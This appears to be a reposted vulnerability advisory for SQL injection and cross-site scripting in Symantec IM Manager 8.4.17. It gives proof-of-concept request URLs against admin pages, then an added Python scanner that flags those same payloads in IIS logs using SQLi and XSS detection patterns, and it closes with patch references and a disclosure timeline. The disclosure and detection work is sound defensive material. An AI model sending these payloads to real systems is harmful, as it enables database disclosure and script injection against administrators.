Saturday, 28 April 2012

Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 10:28 by freda
Description
Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.


Proof of concept
SQL Injection
=============

http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--



Cross-Site Scripting (XSS)
==========================

  • http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
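For a defender who cannot patch immediately, the request strings above are also usable as detection material: both the SQL injection (UNION ... SELECT, @@version, T-SQL char() concatenation) and the XSS payloads (closing </style> and </script> tags followed by a new <script> element) survive URL decoding in IIS W3C logs. The following scanner is an added example written for this page, not code from the advisory or from Symantec. It assumes an IIS log with the eight fields listed in its own #Fields line and uses constructed server and client addresses; the two flagged log lines reuse the advisory's SQL injection and XSS request strings, the rest are ordinary admin-console traffic.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (hypothetical server and client addresses).
# Lines 3 and 5 carry the request strings from the advisory; the others are
# benign admin-console traffic so the scanner has something to ignore.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-02-18 10:01:02 10.0.0.5 GET /IMManager/admin/IMAdminPolicyEnfQry.asp PolicyEnfType=3 10.0.0.20 200
2011-02-18 10:01:09 10.0.0.5 GET /IMManager/admin/IMAdminPolicyEnfQry.asp PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))-- 10.0.0.20 200
2011-02-18 10:02:15 10.0.0.5 GET /IMManager/admin/IMAdminTOC_simple.asp nav=reports&menuitem=newReports 10.0.0.21 200
2011-02-18 10:02:31 10.0.0.5 GET /IMManager/admin/IMAdminSystemDashboard.asp post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E 10.0.0.21 200
2011-02-18 10:03:00 10.0.0.5 GET /IMManager/admin/IMAdminEdituser.asp action=edit&user=bob 10.0.0.22 200
"""

# Signatures matched against each *decoded* query-string value.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),   # UNION ... SELECT tail
    re.compile(r"@@version|@@servername", re.I),       # MSSQL server variables
    re.compile(r"\bchar\(\d+\)", re.I),                # T-SQL char() quoting trick
]
XSS_PATTERNS = [
    re.compile(r"<\s*/?\s*(script|style|iframe|img|svg)\b", re.I),  # tag injection
    re.compile(r"\bon[a-z]+\s*=", re.I),                             # event handlers
    re.compile(r"javascript\s*:", re.I),                             # URL scheme
]


@dataclass
class Finding:
    line_no: int   # 1-based line in the log text
    client: str    # c-ip field
    stem: str      # cs-uri-stem field
    param: str     # query parameter carrying the payload
    kind: str      # "sqli" or "xss"
    decoded: str   # parameter value after percent-decoding


def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so %2520-style double encoding is unwrapped.
    unquote (not unquote_plus) is used so a decoded '+' is not turned into a space."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def classify(value: str):
    """Return 'sqli', 'xss' or None for one decoded parameter value."""
    if any(p.search(value) for p in SQLI_PATTERNS):
        return "sqli"
    if any(p.search(value) for p in XSS_PATTERNS):
        return "xss"
    return None


def parse_w3c(text: str):
    """Yield (line_no, record_dict) for each data line, using the #Fields directive."""
    fields = None
    for n, raw in enumerate(text.splitlines(), 1):
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        parts = raw.split(" ")
        if fields is None or len(parts) != len(fields):
            continue  # malformed line; a real pipeline would count these
        yield n, dict(zip(fields, parts))


def scan_log(text: str, stem_prefix: str = "/IMManager/admin/"):
    """Flag requests under the IM Manager admin console whose parameters look like SQLi or XSS."""
    findings = []
    for n, rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        if not stem.lower().startswith(stem_prefix.lower()):
            continue
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            decoded = decode_param(value)
            kind = classify(decoded)
            if kind:
                findings.append(Finding(n, rec.get("c-ip", "?"), stem, name, kind, decoded))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind.upper()} from {f.client} -> {f.stem}?{f.param}={f.decoded}")
```

Run against the embedded sample it reports line 3 as SQL injection on PolicyEnfType and line 5 as XSS on refreshRateSetting; the benign lines produce nothing. Restricting the scan to the /IMManager/admin/ prefix keeps the signatures from firing on unrelated applications sharing the same IIS instance, and decoding twice catches the common double-encoding trick without the false positives that a third pass on already-decoded SQL would start to produce.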



Solution
Symantec has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/

Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - Patch released.
2011-09-30 - Advisory published by Secunia.